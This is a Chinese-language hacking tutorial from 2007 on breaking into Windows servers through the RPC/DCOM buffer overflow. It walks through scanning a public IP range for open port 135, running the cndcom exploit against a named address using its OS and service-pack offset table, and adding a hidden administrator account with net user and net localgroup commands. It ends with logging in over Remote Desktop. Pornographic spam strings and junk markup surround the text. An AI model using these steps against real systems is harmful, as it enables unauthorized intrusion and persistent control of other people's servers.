• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • 利用RPC漏洞入侵服務器

    發表于:2007-07-02來源:作者:點擊數: 標簽:
    微軟基于WINNT內核的操作系統都存在一個RPC漏洞,這個漏洞太可怕了,是致命的漏洞,如果你不及時打RPC補丁包,就可能成為別人攻擊的目標,他們通過向你發送畸形數據包,導致你的RPC服務進程崩潰,因為許多應用服務程序都依賴于它,就造成這些應用程序服務的拒
      微軟基于WINNT內核的操作系統都存在一個RPC漏洞,這個漏洞太可怕了,是致命的漏洞,如果你不及時打RPC補丁包,就可能成為別人攻擊的目標,他們通過向你發送畸形數據包,導致你的RPC服務進程崩潰,因為許多應用服務程序都依賴于它,就造成這些應用程序服務的拒絕服務,然后就可以通過135端口來提升權限或獲得DCOM客戶端認證的信息。是不是很可怕,很容易就可以獲得管理員權限,控制你的服務器,下面,我們一起來看看入侵存在RPC服務漏洞的服務器的過程。


    一、準備工作
       1、需要使用的黑客軟件:cndcom.exe(包含一個DLL文件cygwin1.dll),它就是利用RPC溢出的入侵程序,針對幾乎所有的WINDOWS版本。
       2、端口掃描工具Superscan,用它掃描135端口的開放情況.


    二、技術分析
      要想成功的入侵服務器,需要具備2個條件:1、服務器存在RPC漏洞 2、TCP協議的135端口要是開放狀態
     

    三、入侵服務器
      所有的工作都準備好了,那么我們開始吧!
       
      1、使用Superscan掃描135端口
       (圖一)
        ①使用Superscan工具掃描“218.22.123.*”這個網段的情況。在IP欄“起始”和“結束”中分別輸入“218.22.123.1”和“218.22.123.254”。
        ②指定掃描的端口為135端口?!八械亩丝诙x”為從”135“到”135“。
        ③顯示掃描的結果,前面帶”+“的都是135端口開放的服務器,這樣我們就可以在這些服務器中尋找存在RPC漏洞的機器。

      2、使用cndcom.exe入侵服務器
      入侵服務器需要一定的耐心和運氣,對上面掃描到的服務器一一試驗,一定會找到存在RPC漏洞的機器。
    先拿218.22.123.26作為目標, 好了,試試我們的手氣吧!
        (圖二)
       ①在命令提示符下輸入”cndcom 17 218.22.123.26“,接著要耐心等待,看看我們的運氣如何!
      這里有必要把cndcom命令的使用情況說明一下:
            cndcom  <標記>   <目標IP地址>
     
     標記是一系列數字,不同的操作系統,打了不同的補丁,它的標記都是不同的,它的對應情況如下:
          0    Windows 2000 SP0 (英文版)
              1    Windows 2000 SP1 (英文版)
              2    Windows 2000 SP2 (英文版)
              3    Windows 2000 SP3 (英文版)
              4    Windows 2000 SP4 (英文版)
              5    Windows XP SP0 (英文版)
              6    Windows XP SP1 (英文版)
              7    Windows NT SP5 (中文版)
              8    Windows NT SP6 (中文版)
              9    Windows NT SP6 (繁體中文版)
              10   Windows 2000 SP0 (中文版)
              11   Windows 2000 SP1 (中文版)
              12   Windows 2000 SP2 (中文版)
              13   Windows 2000 SP2 (中文版)
              14   Windows 2000 SP3 (中文版)
              15   Windows 2000 SP3 (繁體中文版)
              16   Windows 2000 SP4 (中文版)
              17   Windows 2000 SP4 (中文版)
              18   Windows XP SP1 (中文版)
     現在的服務器一般都采用WIN2000服務器版的操作系統,并打上SP4補丁,因此標記選擇”17“入侵服務器的機率就比較大些。
     
     ②我們的手氣不錯??!沒想到第一次就中獎了。這時在命令提示符下顯示"C:\WINNT\SYSTEM32\",我們已經成功的入侵了“218.22.123.26”服務器,從提示符的顯示看,這是一臺WIN2000服務器。

      3、創建系統管理員帳號
     雖然我們已經成功的入侵服務器,但在命令提示符下控制服務器很復雜,因此,使用NET命令來為自己創建一個管理員帳號。
      (圖三)
     ①在“218.22.123.26”服務器上為自己創建一個用戶名為rtj,密碼為“rrttjj"的帳號。
     在”C:\WINNT\SYSTEM32\“提示符下輸入.net user rtj rrttjj /add",然后系統提示“命令成功完成”,這樣就創建了rtj帳號,如果你還不放心,使用"net user"命令查一下,看看rtj帳號是否存在。
      ②雖然創建了rtj帳號,但只是一般用戶還沒有管理員權限,因此要加入到管理員組中。
     在”C:\WINNT\SYSTEM32\“提示符下輸入“net localgroup administrators rtj /add",這樣就提升“rtj”為系統系統管理員。

    四、遠程登錄服務器
     管理員為了管理方便,經常開通終端服務器,用Superscan掃描3389端口是否開放,經掃描發現“218.22.123.26”的3389端口是開放的,下面我們就可以使用rtj帳號遠程登錄服務器。
      運行終端服務器客戶端軟件,IP地址中輸入“218.22.123.26”,單擊“連接”按鈕,然后輸入“rtj帳號”的用戶名和密碼(圖四),就可以登錄到服務器了,這樣一切盡在掌握了。

    小提示:
     RPC補丁下載
    Windows NT 4.0 Server :
         

    Windows 2000:
       

    Windows XP :
       

    Windows Server 2003 :
       
    ,

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>